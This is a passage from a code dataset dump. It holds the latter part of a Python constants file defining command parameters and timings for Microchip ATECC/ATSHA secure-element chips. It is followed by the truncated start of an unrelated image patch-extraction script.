KDF command index for details\r\nKDF_DETAILS_IDX = const(ATCA_DATA_IDX)\r\n# KDF details (param3) size\r\nKDF_DETAILS_SIZE = const(4)\r\nKDF_MESSAGE_IDX = const(ATCA_DATA_IDX + KDF_DETAILS_SIZE)\r\n\r\n# KDF mode source key mask\r\nKDF_MODE_SOURCE_MASK = const(0x03)\r\n# KDF mode source key in TempKey\r\nKDF_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# KDF mode source key in upper TempKey\r\nKDF_MODE_SOURCE_TEMPKEY_UP = const(0x01)\r\n# KDF mode source key in a slot\r\nKDF_MODE_SOURCE_SLOT = const(0x02)\r\n# KDF mode source key in alternate key buffer\r\nKDF_MODE_SOURCE_ALTKEYBUF = const(0x03)\r\n\r\n# KDF mode target key mask\r\nKDF_MODE_TARGET_MASK = const(0x1C)\r\n# KDF mode target key in TempKey\r\nKDF_MODE_TARGET_TEMPKEY = const(0x00)\r\n# KDF mode target key in upper TempKey\r\nKDF_MODE_TARGET_TEMPKEY_UP = const(0x04)\r\n# KDF mode target key in slot\r\nKDF_MODE_TARGET_SLOT = const(0x08)\r\n# KDF mode target key in alternate key buffer\r\nKDF_MODE_TARGET_ALTKEYBUF = const(0x0C)\r\n# KDF mode target key in output buffer\r\nKDF_MODE_TARGET_OUTPUT = const(0x10)\r\n# KDF mode target key encrypted in output buffer\r\nKDF_MODE_TARGET_OUTPUT_ENC = const(0x14)\r\n\r\n# KDF mode algorithm mask\r\nKDF_MODE_ALG_MASK = const(0x60)\r\n# KDF mode PRF algorithm\r\nKDF_MODE_ALG_PRF = const(0x00)\r\n# KDF mode AES algorithm\r\nKDF_MODE_ALG_AES = const(0x20)\r\n# KDF mode HKDF algorithm\r\nKDF_MODE_ALG_HKDF = const(0x40)\r\n\r\n# KDF details for PRF, source key length mask\r\nKDF_DETAILS_PRF_KEY_LEN_MASK = const(0x00000003)\r\n# KDF details for PRF, source key length is 16 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_16 = const(0x00000000)\r\n# KDF details for PRF, source key length is 32 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_32 = const(0x00000001)\r\n# KDF details for PRF, source key length is 48 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_48 = const(0x00000002)\r\n# KDF details for PRF, source key length is 64 bytes\r\nKDF_DETAILS_PRF_KEY_LEN_64 = const(0x00000003)\r\n\r\n# KDF details for PRF, target length mask\r\nKDF_DETAILS_PRF_TARGET_LEN_MASK = const(0x00000100)\r\n# KDF details for PRF, target length is 32 bytes\r\nKDF_DETAILS_PRF_TARGET_LEN_32 = const(0x00000000)\r\n# KDF details for PRF, target length is 64 bytes\r\nKDF_DETAILS_PRF_TARGET_LEN_64 = const(0x00000100)\r\n\r\n# KDF details for PRF, AEAD processing mask\r\nKDF_DETAILS_PRF_AEAD_MASK = const(0x00000600)\r\n# KDF details for PRF, AEAD no processing\r\nKDF_DETAILS_PRF_AEAD_MODE0 = const(0x00000000)\r\n# KDF details for PRF, AEAD First 32 go to target, second 32 go to output buffer\r\nKDF_DETAILS_PRF_AEAD_MODE1 = const(0x00000200)\r\n\r\n# KDF details for AES, key location mask\r\nKDF_DETAILS_AES_KEY_LOC_MASK = const(0x00000003)\r\n\r\n# KDF details for HKDF, message location mask\r\nKDF_DETAILS_HKDF_MSG_LOC_MASK = const(0x00000003)\r\n# KDF details for HKDF, message location in slot\r\nKDF_DETAILS_HKDF_MSG_LOC_SLOT = const(0x00000000)\r\n# KDF details for HKDF, message location in TempKey\r\nKDF_DETAILS_HKDF_MSG_LOC_TEMPKEY = const(0x00000001)\r\n# KDF details for HKDF, message location in input parameter\r\nKDF_DETAILS_HKDF_MSG_LOC_INPUT = const(0x00000002)\r\n# KDF details for HKDF, message location is a special IV function\r\nKDF_DETAILS_HKDF_MSG_LOC_IV = const(0x00000003)\r\n# KDF details for HKDF, key is 32 bytes of zero\r\nKDF_DETAILS_HKDF_ZERO_KEY = const(0x00000004)\r\n\r\n\r\n\"\"\" name Definitions for the Lock Command \"\"\"\r\n# Lock command index for zone\r\nLOCK_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Lock command index for summary\r\nLOCK_SUMMARY_IDX = const(ATCA_PARAM2_IDX)\r\n# Lock command packet size\r\nLOCK_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Lock zone is Config\r\nLOCK_ZONE_CONFIG = const(0x00)\r\n# Lock zone is OTP or Data\r\nLOCK_ZONE_DATA = const(0x01)\r\n# Lock slot of Data\r\nLOCK_ZONE_DATA_SLOT = const(0x02)\r\n# Lock command: Ignore summary.\r\nLOCK_ZONE_NO_CRC = const(0x80)\r\n# Lock parameter 1 bits 6 are 0.\r\nLOCK_ZONE_MASK = const(0xBF)\r\n# Value indicating an unlocked zone\r\nATCA_UNLOCKED = const(0x55)\r\n# Value indicating a locked zone\r\nATCA_LOCKED = const(0x00)\r\n# Lock command response packet size\r\nLOCK_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the MAC Command \"\"\"\r\n# MAC command index for mode\r\nMAC_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# MAC command index for key id\r\nMAC_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# MAC command index for optional challenge\r\nMAC_CHALLENGE_IDX = const(ATCA_DATA_IDX)\r\n# MAC command packet size without challenge\r\nMAC_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN)\r\n# MAC command packet size with challenge\r\nMAC_COUNT_LONG = const(39)\r\n# MAC mode 0: first SHA block from data slot\r\nMAC_MODE_CHALLENGE = const(0x00)\r\n# MAC mode bit 0: second SHA block from TempKey\r\nMAC_MODE_BLOCK2_TEMPKEY = const(0x01)\r\n# MAC mode bit 1: first SHA block from TempKey\r\nMAC_MODE_BLOCK1_TEMPKEY = const(0x02)\r\n# MAC mode bit 2: match TempKey.SourceFlag\r\nMAC_MODE_SOURCE_FLAG_MATCH = const(0x04)\r\n# MAC mode bit 0: second SHA block from TempKey\r\nMAC_MODE_PTNONCE_TEMPKEY = const(0x06)\r\n# MAC mode bit 0-2: pass-through mode\r\nMAC_MODE_PASSTHROUGH = const(0x07)\r\n# MAC mode bit 4: include first 88 OTP bits\r\nMAC_MODE_INCLUDE_OTP_88 = const(0x10)\r\n# MAC mode bit 5: include first 64 OTP bits\r\nMAC_MODE_INCLUDE_OTP_64 = const(0x20)\r\n# MAC mode bit 6: include serial number\r\nMAC_MODE_INCLUDE_SN = const(0x40)\r\n# MAC size of challenge\r\nMAC_CHALLENGE_SIZE = const(32)\r\n# MAC size of response\r\nMAC_SIZE = const(32)\r\n# MAC mode bits 3 and 7 are 0.\r\nMAC_MODE_MASK = const(0x77)\r\n# MAC command response packet size\r\nMAC_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Nonce Command \"\"\"\r\n# Nonce command index for mode\r\nNONCE_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Nonce command index for 2. parameter\r\nNONCE_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Nonce command index for input data\r\nNONCE_INPUT_IDX = const(ATCA_DATA_IDX)\r\n# Nonce command packet size for 20 bytes of NumIn\r\nNONCE_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN + 20)\r\n# Nonce command packet size for 32 bytes of NumIn\r\nNONCE_COUNT_LONG = const(ATCA_CMD_SIZE_MIN + 32)\r\n# Nonce command packet size for 64 bytes of NumIn\r\nNONCE_COUNT_LONG_64 = const(ATCA_CMD_SIZE_MIN + 64)\r\n# Nonce mode bits 2 to 7 are 0.\r\nNONCE_MODE_MASK = const(0x03)\r\n# Nonce mode: update seed\r\nNONCE_MODE_SEED_UPDATE = const(0x00)\r\n# Nonce mode: do not update seed\r\nNONCE_MODE_NO_SEED_UPDATE = const(0x01)\r\n# Nonce mode 2 is invalid.\r\nNONCE_MODE_INVALID = const(0x02)\r\n# Nonce mode: pass-through\r\nNONCE_MODE_PASSTHROUGH = const(0x03)\r\n\r\n# Nonce mode: input size mask\r\nNONCE_MODE_INPUT_LEN_MASK = const(0x20)\r\n# Nonce mode: input size is 32 bytes\r\nNONCE_MODE_INPUT_LEN_32 = const(0x00)\r\n# Nonce mode: input size is 64 bytes\r\nNONCE_MODE_INPUT_LEN_64 = const(0x20)\r\n\r\n# Nonce mode: target mask\r\nNONCE_MODE_TARGET_MASK = const(0xC0)\r\n# Nonce mode: target is TempKey\r\nNONCE_MODE_TARGET_TEMPKEY = const(0x00)\r\n# Nonce mode: target is Message Digest Buffer\r\nNONCE_MODE_TARGET_MSGDIGBUF = const(0x40)\r\n# Nonce mode: target is Alternate Key Buffer\r\nNONCE_MODE_TARGET_ALTKEYBUF = const(0x80)\r\n\r\n# Nonce zero (param2): calculation mode mask\r\nNONCE_ZERO_CALC_MASK = const(0x8000)\r\n# Nonce zero (param2): calculation mode random, use RNG in calculation and return RNG output\r\nNONCE_ZERO_CALC_RANDOM = const(0x0000)\r\n# Nonce zero (param2): calculation mode TempKey, use TempKey in calculation and return new TempKey value\r\nNONCE_ZERO_CALC_TEMPKEY = const(0x8000)\r\n\r\n# Nonce NumIn size for random modes\r\nNONCE_NUMIN_SIZE = const(20)\r\n# Nonce NumIn size for 32-byte pass-through mode\r\nNONCE_NUMIN_SIZE_PASSTHROUGH = const(32)\r\n\r\n# Nonce command response packet size with no output\r\nNONCE_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# Nonce command response packet size with output\r\nNONCE_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Pause Command \"\"\"\r\n# Pause command index for Selector\r\nPAUSE_SELECT_IDX = const(ATCA_PARAM1_IDX)\r\n# Pause command index for 2. parameter\r\nPAUSE_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Pause command packet size\r\nPAUSE_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Pause command response packet size\r\nPAUSE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the PrivWrite Command \"\"\"\r\n# PrivWrite command index for zone\r\nPRIVWRITE_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# PrivWrite command index for KeyID\r\nPRIVWRITE_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# PrivWrite command index for value\r\nPRIVWRITE_VALUE_IDX = const(5)\r\n# PrivWrite command index for MAC\r\nPRIVWRITE_MAC_IDX = const(41)\r\n# PrivWrite command packet size\r\nPRIVWRITE_COUNT = const(75)\r\n# PrivWrite zone bits 0 to 5 and 7 are 0.\r\nPRIVWRITE_ZONE_MASK = const(0x40)\r\n# PrivWrite mode: encrypted\r\nPRIVWRITE_MODE_ENCRYPT = const(0x40)\r\n# PrivWrite command response packet size\r\nPRIVWRITE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Random Command \"\"\"\r\n# Random command index for mode\r\nRANDOM_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Random command index for 2. parameter\r\nRANDOM_PARAM2_IDX = const(ATCA_PARAM2_IDX)\r\n# Random command packet size\r\nRANDOM_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Random mode for automatic seed update\r\nRANDOM_SEED_UPDATE = const(0x00)\r\n# Random mode for no seed update\r\nRANDOM_NO_SEED_UPDATE = const(0x01)\r\n# Number of bytes in the data packet of a random command\r\nRANDOM_NUM_SIZE = const(32)\r\n# Random command response packet size\r\nRANDOM_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Read Command \"\"\"\r\n# Read command index for zone\r\nREAD_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Read command index for address\r\nREAD_ADDR_IDX = const(ATCA_PARAM2_IDX)\r\n# Read command packet size\r\nREAD_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Read zone bits 2 to 6 are 0.\r\nREAD_ZONE_MASK = const(0x83)\r\n# Read command response packet size when reading 4 bytes\r\nREAD_4_RSP_SIZE = const(ATCA_RSP_SIZE_VAL)\r\n# Read command response packet size when reading 32 bytes\r\nREAD_32_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the SecureBoot Command \"\"\"\r\n# SecureBoot command index for mode\r\nSECUREBOOT_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# SecureBoot digest input size\r\nSECUREBOOT_DIGEST_SIZE = const(32)\r\n# SecureBoot signature input size\r\nSECUREBOOT_SIGNATURE_SIZE = const(64)\r\n# SecureBoot command packet size for just a digest\r\nSECUREBOOT_COUNT_DIG = const(ATCA_CMD_SIZE_MIN + SECUREBOOT_DIGEST_SIZE)\r\n# SecureBoot command packet size for a digest and signature\r\nSECUREBOOT_COUNT_DIG_SIG = const(\r\n ATCA_CMD_SIZE_MIN + SECUREBOOT_DIGEST_SIZE + SECUREBOOT_SIGNATURE_SIZE)\r\n# SecureBoot MAC output size\r\nSECUREBOOT_MAC_SIZE = const(32)\r\n# SecureBoot response packet size for no MAC\r\nSECUREBOOT_RSP_SIZE_NO_MAC = const(ATCA_RSP_SIZE_MIN)\r\n# SecureBoot response packet size with MAC\r\nSECUREBOOT_RSP_SIZE_MAC = const(ATCA_PACKET_OVERHEAD + SECUREBOOT_MAC_SIZE)\r\n\r\n# SecureBoot mode mask\r\nSECUREBOOT_MODE_MASK = const(0x07)\r\n# SecureBoot mode Full\r\nSECUREBOOT_MODE_FULL = const(0x05)\r\n# SecureBoot mode FullStore\r\nSECUREBOOT_MODE_FULL_STORE = const(0x06)\r\n# SecureBoot mode FullCopy\r\nSECUREBOOT_MODE_FULL_COPY = const(0x07)\r\n# SecureBoot mode flag to prohibit SecureBoot until next power cycle\r\nSECUREBOOT_MODE_PROHIBIT_FLAG = const(0x40)\r\n# SecureBoot mode flag for encrypted digest and returning validating MAC\r\nSECUREBOOT_MODE_ENC_MAC_FLAG = const(0x80)\r\n\r\n# SecureBootConfig byte offset into the configuration zone\r\nSECUREBOOTCONFIG_OFFSET = const(70)\r\n# Mask for SecureBootMode field in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_MASK = const(0x0003)\r\n# Disabled SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_DISABLED = const(0x0000)\r\n# Both digest and signature always required SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_BOTH = const(0x0001)\r\n# Signature stored SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_SIG = const(0x0002)\r\n# Digest stored SecureBootMode in SecureBootConfig value\r\nSECUREBOOTCONFIG_MODE_FULL_DIG = const(0x0003)\r\n\r\n\r\n\"\"\" name Definitions for the SelfTest Command \"\"\"\r\n# SelfTest command index for mode\r\nSELFTEST_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# SelfTest command packet size\r\nSELFTEST_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# SelfTest mode RNG DRBG function\r\nSELFTEST_MODE_RNG = const(0x01)\r\n# SelfTest mode ECDSA verify function\r\nSELFTEST_MODE_ECDSA_SIGN_VERIFY = const(0x02)\r\n# SelfTest mode ECDH function\r\nSELFTEST_MODE_ECDH = const(0x08)\r\n# SelfTest mode AES encrypt function\r\nSELFTEST_MODE_AES = const(0x10)\r\n# SelfTest mode SHA function\r\nSELFTEST_MODE_SHA = const(0x20)\r\n# SelfTest mode all algorithms\r\nSELFTEST_MODE_ALL = const(0x3B)\r\n# SelfTest command response packet size\r\nSELFTEST_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the SHA Command \"\"\"\r\nSHA_COUNT_SHORT = const(ATCA_CMD_SIZE_MIN)\r\n# Just a starting size\r\nSHA_COUNT_LONG = const(ATCA_CMD_SIZE_MIN)\r\nATCA_SHA_DIGEST_SIZE = const(32)\r\nSHA_DATA_MAX = const(64)\r\nATCA_SHA256_BLOCK_SIZE = const(64)\r\nSHA_CONTEXT_MAX_SIZE = const(99)\r\n\r\n# Mask the bit 0-2\r\nSHA_MODE_MASK = const(0x07)\r\n# Initialization, does not accept a message\r\nSHA_MODE_SHA256_START = const(0x00)\r\n# Add 64 bytes in the meesage to the SHA context\r\nSHA_MODE_SHA256_UPDATE = const(0x01)\r\n# Complete the calculation and return the digest\r\nSHA_MODE_SHA256_END = const(0x02)\r\n# Add 64 byte ECC public key in the slot to the SHA context\r\nSHA_MODE_SHA256_PUBLIC = const(0x03)\r\n# Initialization, HMAC calculation\r\nSHA_MODE_HMAC_START = const(0x04)\r\n# Add 64 bytes in the meesage to the SHA context\r\nSHA_MODE_HMAC_UPDATE = const(0x01)\r\n# Complete the HMAC computation and return digest\r\nSHA_MODE_HMAC_END = const(0x05)\r\n# Complete the HMAC computation and return digest... Different command on 608\r\nSHA_MODE_608_HMAC_END = const(0x02)\r\n# Read current SHA-256 context out of the device\r\nSHA_MODE_READ_CONTEXT = const(0x06)\r\n# Restore a SHA-256 context into the device\r\nSHA_MODE_WRITE_CONTEXT = const(0x07)\r\n# Resulting digest target location mask\r\nSHA_MODE_TARGET_MASK = const(0xC0)\r\n# Place resulting digest both in Output buffer and TempKey\r\nSHA_MODE_TARGET_TEMPKEY = const(0x00)\r\n# Place resulting digest both in Output buffer and Message Digest Buffer\r\nSHA_MODE_TARGET_MSGDIGBUF = const(0x40)\r\n# Place resulting digest both in Output buffer ONLY\r\nSHA_MODE_TARGET_OUT_ONLY = const(0xC0)\r\n\r\n# SHA command response packet size\r\nSHA_RSP_SIZE = const(ATCA_RSP_SIZE_32)\r\n# SHA command response packet size only status code\r\nSHA_RSP_SIZE_SHORT = const(ATCA_RSP_SIZE_MIN)\r\n# SHA command response packet size\r\nSHA_RSP_SIZE_LONG = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Sign Command \"\"\"\r\n# Sign command index for mode\r\nSIGN_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Sign command index for key id\r\nSIGN_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Sign command packet size\r\nSIGN_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# Sign mode bits 1 to 4 are 0\r\nSIGN_MODE_MASK = const(0xE1)\r\n# Sign mode\t 0: internal\r\nSIGN_MODE_INTERNAL = const(0x00)\r\n# Sign mode bit 1: Signature will be used for Verify(Invalidate)\r\nSIGN_MODE_INVALIDATE = const(0x01)\r\n# Sign mode bit 6: include serial number\r\nSIGN_MODE_INCLUDE_SN = const(0x40)\r\n# Sign mode bit 7: external\r\nSIGN_MODE_EXTERNAL = const(0x80)\r\n# Sign mode message source mask\r\nSIGN_MODE_SOURCE_MASK = const(0x20)\r\n# Sign mode message source is TempKey\r\nSIGN_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# Sign mode message source is the Message Digest Buffer\r\nSIGN_MODE_SOURCE_MSGDIGBUF = const(0x20)\r\n# Sign command response packet size\r\nSIGN_RSP_SIZE = const(ATCA_RSP_SIZE_MAX)\r\n\r\n\"\"\" name Definitions for the UpdateExtra Command \"\"\"\r\n# UpdateExtra command index for mode\r\nUPDATE_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# UpdateExtra command index for new value\r\nUPDATE_VALUE_IDX = const(ATCA_PARAM2_IDX)\r\n# UpdateExtra command packet size\r\nUPDATE_COUNT = const(ATCA_CMD_SIZE_MIN)\r\n# UpdateExtra mode update UserExtra (config byte 84)\r\nUPDATE_MODE_USER_EXTRA = const(0x00)\r\n# UpdateExtra mode update Selector (config byte 85)\r\nUPDATE_MODE_SELECTOR = const(0x01)\r\n# UpdateExtra mode update UserExtraAdd (config byte 85)\r\nUPDATE_MODE_USER_EXTRA_ADD = const(UPDATE_MODE_SELECTOR)\r\n# UpdateExtra mode: decrement counter\r\nUPDATE_MODE_DEC_COUNTER = const(0x02)\r\n# UpdateExtra command response packet size\r\nUPDATE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" name Definitions for the Verify Command \"\"\"\r\n# Verify command index for mode\r\nVERIFY_MODE_IDX = const(ATCA_PARAM1_IDX)\r\n# Verify command index for key id\r\nVERIFY_KEYID_IDX = const(ATCA_PARAM2_IDX)\r\n# Verify command index for data\r\nVERIFY_DATA_IDX = const(5)\r\n# Verify command packet size for 256-bit key in stored mode\r\nVERIFY_256_STORED_COUNT = const(71)\r\n# Verify command packet size for 283-bit key in stored mode\r\nVERIFY_283_STORED_COUNT = const(79)\r\n# Verify command packet size for 256-bit key in validate mode\r\nVERIFY_256_VALIDATE_COUNT = const(90)\r\n# Verify command packet size for 283-bit key in validate mode\r\nVERIFY_283_VALIDATE_COUNT = const(98)\r\n# Verify command packet size for 256-bit key in external mode\r\nVERIFY_256_EXTERNAL_COUNT = const(135)\r\n# Verify command packet size for 283-bit key in external mode\r\nVERIFY_283_EXTERNAL_COUNT = const(151)\r\n# Verify key size for 256-bit key\r\nVERIFY_256_KEY_SIZE = const(64)\r\n# Verify key size for 283-bit key\r\nVERIFY_283_KEY_SIZE = const(72)\r\n# Verify signature size for 256-bit key\r\nVERIFY_256_SIGNATURE_SIZE = const(64)\r\n# Verify signature size for 283-bit key\r\nVERIFY_283_SIGNATURE_SIZE = const(72)\r\n# Verify size of \"other data\"\r\nVERIFY_OTHER_DATA_SIZE = const(19)\r\n# Verify mode bits 2 to 7 are 0\r\nVERIFY_MODE_MASK = const(0x03)\r\n# Verify mode: stored\r\nVERIFY_MODE_STORED = const(0x00)\r\n# Verify mode: validate external\r\nVERIFY_MODE_VALIDATE_EXTERNAL = const(0x01)\r\n# Verify mode: external\r\nVERIFY_MODE_EXTERNAL = const(0x02)\r\n# Verify mode: validate\r\nVERIFY_MODE_VALIDATE = const(0x03)\r\n# Verify mode: invalidate\r\nVERIFY_MODE_INVALIDATE = const(0x07)\r\n# Verify mode message source mask\r\nVERIFY_MODE_SOURCE_MASK = const(0x20)\r\n# Verify mode message source is TempKey\r\nVERIFY_MODE_SOURCE_TEMPKEY = const(0x00)\r\n# Verify mode message source is the Message Digest Buffer\r\nVERIFY_MODE_SOURCE_MSGDIGBUF = const(0x20)\r\n# Verify mode: MAC\r\nVERIFY_MODE_MAC_FLAG = const(0x80)\r\n# Verify key type: B283\r\nVERIFY_KEY_B283 = const(0)\r\n# Verify key type: K283\r\nVERIFY_KEY_K283 = const(0x0001)\r\n# Verify key type: P256\r\nVERIFY_KEY_P256 = const(0x0004)\r\n# Verify command response packet size\r\nVERIFY_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n# Verify command response packet size with validating MAC\r\nVERIFY_RSP_SIZE_MAC = const(ATCA_RSP_SIZE_32)\r\n\r\n\r\n\"\"\" name Definitions for the Write Command \"\"\"\r\n# Write command index for zone\r\nWRITE_ZONE_IDX = const(ATCA_PARAM1_IDX)\r\n# Write command index for address\r\nWRITE_ADDR_IDX = const(ATCA_PARAM2_IDX)\r\n# Write command index for data\r\nWRITE_VALUE_IDX = const(ATCA_DATA_IDX)\r\n# Write command index for MAC following short data\r\nWRITE_MAC_VS_IDX = const(9)\r\n# Write command index for MAC following long data\r\nWRITE_MAC_VL_IDX = const(37)\r\n# Write MAC size\r\nWRITE_MAC_SIZE = const(32)\r\n# Write zone bits 2 to 5 are 0.\r\nWRITE_ZONE_MASK = const(0xC3)\r\n# Write zone bit 6: write encrypted with MAC\r\nWRITE_ZONE_WITH_MAC = const(0x40)\r\n# Write zone id OTP\r\nWRITE_ZONE_OTP = const(1)\r\n# Write zone id data\r\nWRITE_ZONE_DATA = const(2)\r\n# Write command response packet size\r\nWRITE_RSP_SIZE = const(ATCA_RSP_SIZE_MIN)\r\n\r\n\r\n\"\"\" Execution times (ms) for ATSHA204A supported commands \"\"\"\r\nATSHA204A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 38,\r\n ATCA_DERIVE_KEY: 62,\r\n ATCA_GENDIG: 43,\r\n ATCA_HMAC: 69,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 24,\r\n ATCA_MAC: 35,\r\n ATCA_NONCE: 60,\r\n ATCA_PAUSE: 2,\r\n ATCA_RANDOM: 50,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 22,\r\n ATCA_UPDATE_EXTRA: 12,\r\n ATCA_WRITE: 42\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC108A supported commands \"\"\"\r\nATECC108A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 13,\r\n ATCA_COUNTER: 20,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_GENDIG: 11,\r\n ATCA_GENKEY: 115,\r\n ATCA_HMAC: 23,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 32,\r\n ATCA_MAC: 14,\r\n ATCA_NONCE: 29,\r\n ATCA_PAUSE: 3,\r\n ATCA_PRIVWRITE: 48,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 9,\r\n ATCA_SIGN: 60,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 72,\r\n ATCA_WRITE: 26\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC508A supported commands \"\"\"\r\nATECC508A_EXECUTION_TIME = {\r\n ATCA_CHECKMAC: 13,\r\n ATCA_COUNTER: 20,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_ECDH: 58,\r\n ATCA_GENDIG: 11,\r\n ATCA_GENKEY: 115,\r\n ATCA_HMAC: 23,\r\n ATCA_INFO: 2,\r\n ATCA_LOCK: 32,\r\n ATCA_MAC: 14,\r\n ATCA_NONCE: 29,\r\n ATCA_PAUSE: 3,\r\n ATCA_PRIVWRITE: 48,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SHA: 9,\r\n ATCA_SIGN: 60,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 72,\r\n ATCA_WRITE: 26\r\n}\r\n\r\n\"\"\" Execution times (ms) for ATECC608A supported commands \"\"\"\r\nATECC608A_EXECUTION_TIME = {\r\n ATCA_AES: 27,\r\n ATCA_CHECKMAC: 40,\r\n ATCA_COUNTER: 25,\r\n ATCA_DERIVE_KEY: 50,\r\n ATCA_ECDH: 60,\r\n ATCA_GENDIG: 25,\r\n ATCA_GENKEY: 115,\r\n ATCA_INFO: 5,\r\n ATCA_KDF: 165,\r\n ATCA_LOCK: 35,\r\n ATCA_MAC: 55,\r\n ATCA_NONCE: 20,\r\n ATCA_PRIVWRITE: 50,\r\n ATCA_RANDOM: 23,\r\n ATCA_READ: 5,\r\n ATCA_SECUREBOOT: 80,\r\n ATCA_SELFTEST: 250,\r\n ATCA_SHA: 36,\r\n ATCA_SIGN: 115,\r\n ATCA_UPDATE_EXTRA: 10,\r\n ATCA_VERIFY: 105,\r\n ATCA_WRITE: 45\r\n}\r\n\r\nEXECUTION_TIME = {\r\n \"ATSHA204A\": ATSHA204A_EXECUTION_TIME,\r\n \"ATECC108A\": ATECC108A_EXECUTION_TIME,\r\n \"ATECC508A\": ATECC508A_EXECUTION_TIME,\r\n \"ATECC608A\": ATECC608A_EXECUTION_TIME\r\n}\r\n","sub_path":"cryptoauthlib/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":37921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29358212","text":"import numpy as np\nimport cv2\nimport time\nimport matplotlib.pyplot as plt\nfrom patchextraction import *\nfrom time import perf_counter\n\n\n\ndef viewPatchNeighbor(img, patch_index, patch_size, stride, neightbor_offset):\n try:\n height, width, n_scales = img.shape\n img_temp = img\n\n except ValueError:\n height, width = img.shape\n n_scales = 1\n img_temp = img[:,:,np.newaxis]\n \n n_patches_in_height = int(np.floor((height - patch_size + stride) / stride))\n n_patches_in_width = int(np.floor((width - patch_size + stride) / stride))\n\n patch_col = patch_index % n_patches_in_width\n patch_row = int(patch_index / n_patches_in_width)\n\n # Neighborhood of the selected patch:\n active_row_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset) + patch_row\n active_col_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset) + patch_col\n neighborhood_active_row_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset)\n neighborhood_active_col_indices = np.arange(-int(np.floor(patch_size/2)) - neightbor_offset, int(np.ceil(patch_size/2)) + neightbor_offset)\n \n offset = int(np.floor(patch_size/2)) + neightbor_offset\n\n neighborhood_active_row_indices = neighborhood_active_row_indices[np.where(active_row_indices >= 0)[0]]\n active_row_indices = active_row_indices[np.where(active_row_indices >= 0)[0]]\n \n neighborhood_active_row_indices = neighborhood_active_row_indices[np.where(active_row_indices < height)[0]]\n active_row_indices = active_row_indices[np.where(active_row_indices < height)[0]]\n \n neighborhood_active_col_indices = neighborhood_active_col_indices[np.where(active_col_indices >= 0)[0]]\n active_col_indices = active_col_indices[np.where(active_col_indices >= 0)[0]]\n \n neighborhood_active_col_indices = neighborhood_active_col_indices[np.where(active_col_indices < width)[0]]\n active_col_indices = active_col_indices[np.where(active_col_indices < width)[0]]\n\n active_col_indices, active_row_indices = np.meshgrid(active_col_indices, active_row_indices)\n active_col_indices = active_col_indices.reshape(active_col_indices.size)\n active_row_indices = active_row_indices.reshape(active_row_indices.size)\n \n neighborhood_active_col_indices, 